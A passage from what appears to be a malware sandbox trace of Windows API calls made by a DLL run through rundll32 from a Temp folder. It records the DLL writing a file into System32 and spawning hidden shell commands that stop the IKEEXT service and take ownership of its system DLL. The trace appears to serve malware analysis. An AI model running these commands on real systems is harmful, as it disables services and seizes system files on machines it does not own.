lpProcName="InitializeCriticalSectionEx") returned 0x765e3879 [0047.202] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0047.202] GetLastError () returned 0x57 [0047.202] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0047.202] GetProcAddress (hModule=0x76590000, lpProcName="FlsAlloc") returned 0x765e418d [0047.202] GetProcAddress (hModule=0x76590000, lpProcName="FlsSetValue") returned 0x765e76e6 [0047.203] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0047.203] GetLastError () returned 0x57 [0047.203] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x0 [0047.203] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0047.203] GetLastError () returned 0x57 [0047.203] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76590000 [0047.203] GetProcAddress (hModule=0x76590000, lpProcName="InitializeCriticalSectionEx") returned 0x765e3879 [0047.204] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0047.204] GetLastError () returned 0x57 [0047.204] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0047.204] GetProcAddress (hModule=0x76590000, lpProcName="FlsAlloc") returned 0x765e418d [0047.204] GetLastError () returned 0x7e [0047.204] GetProcAddress (hModule=0x76590000, lpProcName="FlsGetValue") returned 0x765e1e16 [0047.204] GetProcAddress (hModule=0x76590000, lpProcName="FlsSetValue") returned 0x765e76e6 [0047.204] SetLastError (dwErrCode=0x7e) [0047.205] GetStartupInfoW (in: lpStartupInfo=0x14f4b8 | out: lpStartupInfo=0x14f4b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\rundll32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x5ef18a30, hStdOutput=0xff1a5e, hStdError=0xfffffffe)) [0047.205] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0047.205] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0047.205] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0047.205] GetCommandLineA () returned="\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll SSSS" [0047.206] GetCommandLineW () returned="\"C:\\Windows\\system32\\rundll32.exe\" C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll SSSS" [0047.206] GetLastError () returned 0x7e [0047.206] SetLastError (dwErrCode=0x7e) [0047.206] GetLastError () returned 0x7e [0047.206] SetLastError (dwErrCode=0x7e) [0047.206] GetACP () returned 0x4e4 [0047.206] IsValidCodePage (CodePage=0x4e4) returned 1 [0047.206] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f4e8 | out: lpCPInfo=0x14f4e8) returned 1 [0047.206] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14edb0 | out: lpCPInfo=0x14edb0) returned 1 [0047.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0047.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3c4, cbMultiByte=256, lpWideCharStr=0x14eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0047.206] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x14edc4 | out: lpCharType=0x14edc4) returned 1 [0047.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0047.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3c4, cbMultiByte=256, lpWideCharStr=0x14eaf8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0047.206] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0047.206] GetLastError () returned 0x57 [0047.206] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0047.206] GetProcAddress (hModule=0x76590000, lpProcName="LCMapStringEx") returned 0x7661f72b [0047.206] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0047.206] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x14e8e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0047.206] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x14f2c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ>ê\x18^", lpUsedDefaultChar=0x0) returned 256 [0047.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0047.206] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f3c4, cbMultiByte=256, lpWideCharStr=0x14eb18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0047.207] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0047.207] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x14e908, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0047.207] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x14f1c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ>ê\x18^", lpUsedDefaultChar=0x0) returned 256 [0047.207] RtlInitializeSListHead (in: ListHead=0x5ef33f50 | out: ListHead=0x5ef33f50) [0047.207] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0047.207] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x5ef34040, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe")) returned 0x20 [0047.207] GetEnvironmentStringsW () returned 0x283618* [0047.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1031, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1031 [0047.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1031, lpMultiByteStr=0x283e30, cbMultiByte=1031, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1031 [0047.207] FreeEnvironmentStringsW (penv=0x283618) returned 1 [0047.208] LoadLibraryA (lpLibFileName="Shlwapi") returned 0x76b40000 [0047.209] LoadLibraryA (lpLibFileName="Shell32") returned 0x758a0000 [0047.213] LoadLibraryA (lpLibFileName="Advapi32") returned 0x764f0000 [0047.227] SSSS () returned 0x0 [0047.227] IsUserAnAdmin () returned 1 [0047.228] GetNativeSystemInfo (in: lpSystemInfo=0x14eff8 | out: lpSystemInfo=0x14eff8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0047.228] GetSystemDirectoryA (in: lpBuffer=0x14f1a0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.228] GetLastError () returned 0x0 [0047.228] SetLastError (dwErrCode=0x0) [0047.228] GetLastError () returned 0x0 [0047.228] SetLastError (dwErrCode=0x0) [0047.228] GetLastError () returned 0x0 [0047.228] SetLastError (dwErrCode=0x0) [0047.228] GetLastError () returned 0x0 [0047.228] SetLastError (dwErrCode=0x0) [0047.228] GetLastError () returned 0x0 [0047.228] SetLastError (dwErrCode=0x0) [0047.228] PathFileExistsA (pszPath="C:\\Windows\\system32\\sensr9.dat") returned 0 [0047.228] CreateFileA (lpFileName="C:\\Windows\\system32\\sensr9.dat" (normalized: "c:\\windows\\system32\\sensr9.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x74 [0047.229] WriteFile (in: hFile=0x74, lpBuffer=0x5ef36000*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x14f038, lpOverlapped=0x0 | out: lpBuffer=0x5ef36000*, lpNumberOfBytesWritten=0x14f038*=0x1000, lpOverlapped=0x0) returned 1 [0047.230] CloseHandle (hObject=0x74) returned 1 [0047.230] GetLastError () returned 0x0 [0047.230] SetLastError (dwErrCode=0x0) [0047.230] GetSystemDirectoryA (in: lpBuffer=0x14ef10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.230] GetLastError () returned 0x0 [0047.230] SetLastError (dwErrCode=0x0) [0047.230] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"net stop /y ikeext\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x14e6c8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14e6b8 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"net stop /y ikeext\"", lpProcessInformation=0x14e6b8*(hProcess=0x70, hThread=0x74, dwProcessId=0xb7c, dwThreadId=0xb80)) returned 1 [0047.236] WaitForSingleObject (hHandle=0x70, dwMilliseconds=0xffffffff) returned 0x0 [0047.591] CloseHandle (hObject=0x70) returned 1 [0047.591] CloseHandle (hObject=0x74) returned 1 [0047.591] GetLastError () returned 0x0 [0047.591] SetLastError (dwErrCode=0x0) [0047.591] GetSystemDirectoryA (in: lpBuffer=0x14ef10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.591] GetLastError () returned 0x0 [0047.591] SetLastError (dwErrCode=0x0) [0047.591] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"takeown /F C:\\Windows\\system32\\ikeext.dll\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x14e6c8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14e6b8 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c \"takeown /F C:\\Windows\\system32\\ikeext.dll\"", lpProcessInformation=0x14e6b8*(hProcess=0x70, hThread=0x74, dwProcessId=0xba0, dwThreadId=0xba4)) returned 1 [0047.595] WaitForSingleObject (hHandle=0x70, dwMilliseconds=0xffffffff) returned 0x0 [0047.971] CloseHandle (hObject=0x70) returned 1 [0047.971] CloseHandle (hObject=0x74) returned 1 [0047.971] GetLastError () returned 0x0 [0047.971] SetLastError (dwErrCode=0x0) [0047.972] GetSystemDirectoryA (in: lpBuffer=0x14ef10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0047.972] GetLastError () returned 0x0 [0047.972] SetLastError (dwErrCode=0x0) [0047.972] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\W